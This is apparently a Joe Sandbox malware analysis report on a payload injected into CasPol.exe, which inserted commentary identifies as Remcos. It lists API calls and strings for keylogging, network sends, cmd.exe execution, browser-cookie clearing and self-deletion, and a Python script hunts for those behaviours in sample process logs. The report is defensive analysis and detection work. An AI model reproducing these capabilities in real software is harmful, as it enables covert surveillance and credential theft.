                                                                                                              • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000,?,00434403), ref: 0043A87F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                            • String ID: *?$.
                                                                                                            • API String ID: 2812119850-3972193922
                                                                                                            • Opcode ID: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                                                                                                            • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                                                                                                            • Opcode Fuzzy Hash: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                                                                                                            • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                                                                                                            APIs
                                                                                                            • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                              • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                              • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                              • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                            • String ID: XCG$`AG$>G
                                                                                                            • API String ID: 2334542088-2372832151
                                                                                                            • Opcode ID: ce0f8d336d2a156708e4fb79cc9eb4dc9fb8683efa97e21ee82fd6c7139a85ed
                                                                                                            • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                                                            • Opcode Fuzzy Hash: ce0f8d336d2a156708e4fb79cc9eb4dc9fb8683efa97e21ee82fd6c7139a85ed
                                                                                                            • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00442714
                                                                                                            • _free.LIBCMT ref: 004427DF
                                                                                                            • _free.LIBCMT ref: 004427E9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$FileModuleName
                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                            • API String ID: 2506810119-3657627342
                                                                                                            • Opcode ID: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                                                                                                            • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                                                            • Opcode Fuzzy Hash: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                                                                                                            • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                              • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                            • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                            • String ID: /sort "Visit Time" /stext "$8>G
                                                                                                            • API String ID: 368326130-2663660666
                                                                                                            • Opcode ID: c4263464be22f02838b4d8536b2b9f3deae672e2af24e6496d28b6afc4a6d1c8
                                                                                                            • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                                                                            • Opcode Fuzzy Hash: c4263464be22f02838b4d8536b2b9f3deae672e2af24e6496d28b6afc4a6d1c8
                                                                                                            • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                                                                            APIs
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 00409946
                                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateThread$LocalTimewsprintf
                                                                                                            • String ID: Offline Keylogger Started
                                                                                                            • API String ID: 465354869-4114347211
                                                                                                            • Opcode ID: 37852cb36ddf9343104c0579adaedb1d6044286f869547d9c6730b709b6f6d7f
                                                                                                            • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                                                                            • Opcode Fuzzy Hash: 37852cb36ddf9343104c0579adaedb1d6044286f869547d9c6730b709b6f6d7f
                                                                                                            • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateThread$LocalTime$wsprintf
                                                                                                            • String ID: Online Keylogger Started
                                                                                                            • API String ID: 112202259-1258561607
                                                                                                            • Opcode ID: cb4b4d00bd1f48587d0ff016746fdd274eca288aaf42b5913708234c7b45ab26
                                                                                                            • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                                                                            • Opcode Fuzzy Hash: cb4b4d00bd1f48587d0ff016746fdd274eca288aaf42b5913708234c7b45ab26
                                                                                                            • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                                                                            • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                                                                            • __dosmaperr.LIBCMT ref: 0044AAFE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                            • String ID: `@
                                                                                                            • API String ID: 2583163307-951712118
                                                                                                            • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                            • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                                                                            • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                            • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseEventHandleObjectSingleWait
                                                                                                            • String ID: Connection Timeout
                                                                                                            • API String ID: 2055531096-499159329
                                                                                                            • Opcode ID: 6ad77e449ea0c8f5081632a4e06be94507840fe6c7293467847821b6de829208
                                                                                                            • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                                                                            • Opcode Fuzzy Hash: 6ad77e449ea0c8f5081632a4e06be94507840fe6c7293467847821b6de829208
                                                                                                            • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                                                                            APIs
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                                              • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                                                                              • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                            • String ID: bad locale name
                                                                                                            • API String ID: 3628047217-1405518554
                                                                                                            • Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                                            • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                                                                            • Opcode Fuzzy Hash: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                                            • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                                                                            APIs
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExecuteShell
                                                                                                            • String ID: /C $cmd.exe$open
                                                                                                            • API String ID: 587946157-3896048727
                                                                                                            • Opcode ID: 7d804f516a62bf7a6255b3e0914bf23257692c2765e93924c49a27dcea95556c
                                                                                                            • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                            • Opcode Fuzzy Hash: 7d804f516a62bf7a6255b3e0914bf23257692c2765e93924c49a27dcea95556c
                                                                                                            • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
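Two of the function records above give process-level handles for hunting this payload: the dump is the Remcos code running inside CasPol.exe (GetModuleFileNameA returns the CasPol.exe path), it launches a shell with ShellExecuteW("open", "cmd.exe", "/C ..."), and it carries the NirSoft-style browser-history export arguments `/sort "Visit Time" /stext`. The following is an added example, not part of the Joe Sandbox report or of the sample, that turns those three observations into checks over process-creation telemetry. The event dicts are constructed for the example (Sysmon-like fields, not real log output), and the assumption that CasPol.exe never legitimately spawns child processes in the monitored environment is the analyst's, not the report's.

```python
"""Hunt process-creation events for the behaviour documented in the CasPol.exe
dump: CasPol.exe spawning cmd.exe /C (ShellExecuteW open/cmd.exe) and the
NirSoft-style '/sort "Visit Time" /stext' export arguments.
All events below are constructed for this example."""
from __future__ import annotations

import re

CASPOL = "caspol.exe"   # host process of the injected payload (from the dump path)
CMD = "cmd.exe"         # ShellExecuteW(open, cmd.exe, ...) target seen at 004151F4

# Constructed, Sysmon-like process-creation records (not taken from the report).
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"',
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"pid": 4188, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /C whoami",
     "parent_image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"},
    {"pid": 4200, "image": r"C:\Users\victim\AppData\Local\Temp\bh.exe",
     "cmdline": r'"C:\Users\victim\AppData\Local\Temp\bh.exe" /sort "Visit Time" /stext "C:\Users\victim\AppData\Local\Temp\h.txt"',
     "parent_image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"},
    {"pid": 5000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /C dir",
     "parent_image": r"C:\Windows\explorer.exe"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return re.split(r"[\\/]", path)[-1].lower()


def tokenize(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, keeping double-quoted spans
    whole and stripping their quotes. Backslashes are left untouched because on
    Windows they are path separators, not escape characters (so shlex is avoided)."""
    toks = re.findall(r'"[^"]*"|\S+', cmdline)
    return [t[1:-1] if len(t) >= 2 and t[0] == '"' and t[-1] == '"' else t for t in toks]


def classify(ev: dict) -> list[str]:
    """Return the names of every rule the event matches, in a fixed order."""
    hits: list[str] = []
    parent = basename(ev.get("parent_image", ""))
    image = basename(ev.get("image", ""))
    lowered = [t.lower() for t in tokenize(ev.get("cmdline", ""))]

    # Assumption: CasPol.exe is a command-line policy tool and does not spawn
    # children in normal use, so any child process is worth triage.
    if parent == CASPOL:
        hits.append("caspol_child_process")
        # The ShellExecuteW("open", "cmd.exe", ...) call with the "/C " prefix.
        if image == CMD and "/c" in lowered:
            hits.append("caspol_spawns_cmd_c")

    # NirSoft-style "save report as text" switch, regardless of parent.
    if "/stext" in lowered:
        hits.append("nirsoft_stext_export")
        # The exact sort key carried by the payload: /sort "Visit Time".
        i = lowered.index("/sort") if "/sort" in lowered else -1
        if i >= 0 and i + 1 < len(lowered) and lowered[i + 1] == "visit time":
            hits.append("nirsoft_visit_time_sort")
    return hits


def hunt(events: list[dict]) -> dict[int, list[str]]:
    """Map pid -> matched rules for every event that matched at least one rule."""
    findings: dict[int, list[str]] = {}
    for ev in events:
        hits = classify(ev)
        if hits:
            findings[ev["pid"]] = hits
    return findings


if __name__ == "__main__":
    for pid, rules in hunt(SAMPLE_EVENTS).items():
        print(f"pid {pid}: {', '.join(rules)}")
```

The benign `explorer.exe -> cmd.exe /C dir` event is included so the CasPol parent check, not the `/C` switch alone, is what carries the alert; the `/stext` rule fires on its own because that switch is unusual outside the NirSoft tools the strings point at.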
                                                                                                            APIs
                                                                                                            • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                            • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                            • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: TerminateThread$HookUnhookWindows
                                                                                                            • String ID: pth_unenc
                                                                                                            • API String ID: 3123878439-4028850238
                                                                                                            • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                            • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                                            • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                            • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                            • String ID: GetLastInputInfo$User32.dll
                                                                                                            • API String ID: 2574300362-1519888992
                                                                                                            • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                            • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                                                                            • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                            • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 1036877536-0
                                                                                                            • Opcode ID: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                                                                                                            • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                                                                            • Opcode Fuzzy Hash: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                                                                                                            • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• Opcode ID: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
• Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
• Opcode Fuzzy Hash: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
• Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
• CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
• CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: Create$CloseEventHandleObjectSingleThreadWait
• API String ID: 3360349984-0
• Opcode ID: b29a8bcc01a21f7fe38ddc3438b80264c3974fc0b274f3a4a7c26760eb770a85
• Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
• Opcode Fuzzy Hash: b29a8bcc01a21f7fe38ddc3438b80264c3974fc0b274f3a4a7c26760eb770a85
• Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
Strings
• [Cleared browsers logins and cookies.], xrefs: 0040B8DE
• Cleared browsers logins and cookies., xrefs: 0040B8EF
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: Sleep
• String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
• API String ID: 3472027048-1236744412
• Opcode ID: f67da73cb2a02539f4d7dbc2d65eb95b4f98d554b542dc907f6a3b7988cd3d28
• Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
• Opcode Fuzzy Hash: f67da73cb2a02539f4d7dbc2d65eb95b4f98d554b542dc907f6a3b7988cd3d28
• Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
APIs
  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
• Sleep.KERNEL32(00000BB8), ref: 004115C3
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: CloseOpenQuerySleepValue
• String ID: @CG$exepath$BG
• API String ID: 4119054056-3221201242
• Opcode ID: 4b5d4860d097bb15903a365519ba02cddbdb2c7d02e23e68ccb2f20ada22baa5
• Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
• Opcode Fuzzy Hash: 4b5d4860d097bb15903a365519ba02cddbdb2c7d02e23e68ccb2f20ada22baa5
• Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
APIs
  • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
  • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
  • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
• Sleep.KERNEL32(000001F4), ref: 00409C95
• Sleep.KERNEL32(00000064), ref: 00409D1F
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: Window$SleepText$ForegroundLength
• String ID: [ $ ]
• API String ID: 3309952895-93608704
• Opcode ID: 7d648279a39037f0c5f174499f798c92f938224ad1328bcf7918cf7612db1a1c
• Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
• Opcode Fuzzy Hash: 7d648279a39037f0c5f174499f798c92f938224ad1328bcf7918cf7612db1a1c
• Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5EB
• WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B5FF
• CloseHandle.KERNEL32(00000000), ref: 0041B60C
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: File$CloseCreateHandlePointerWrite
• API String ID: 3604237281-0
• Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
• Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
• Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
• Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
• Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
• Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
• Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
• Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
• Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
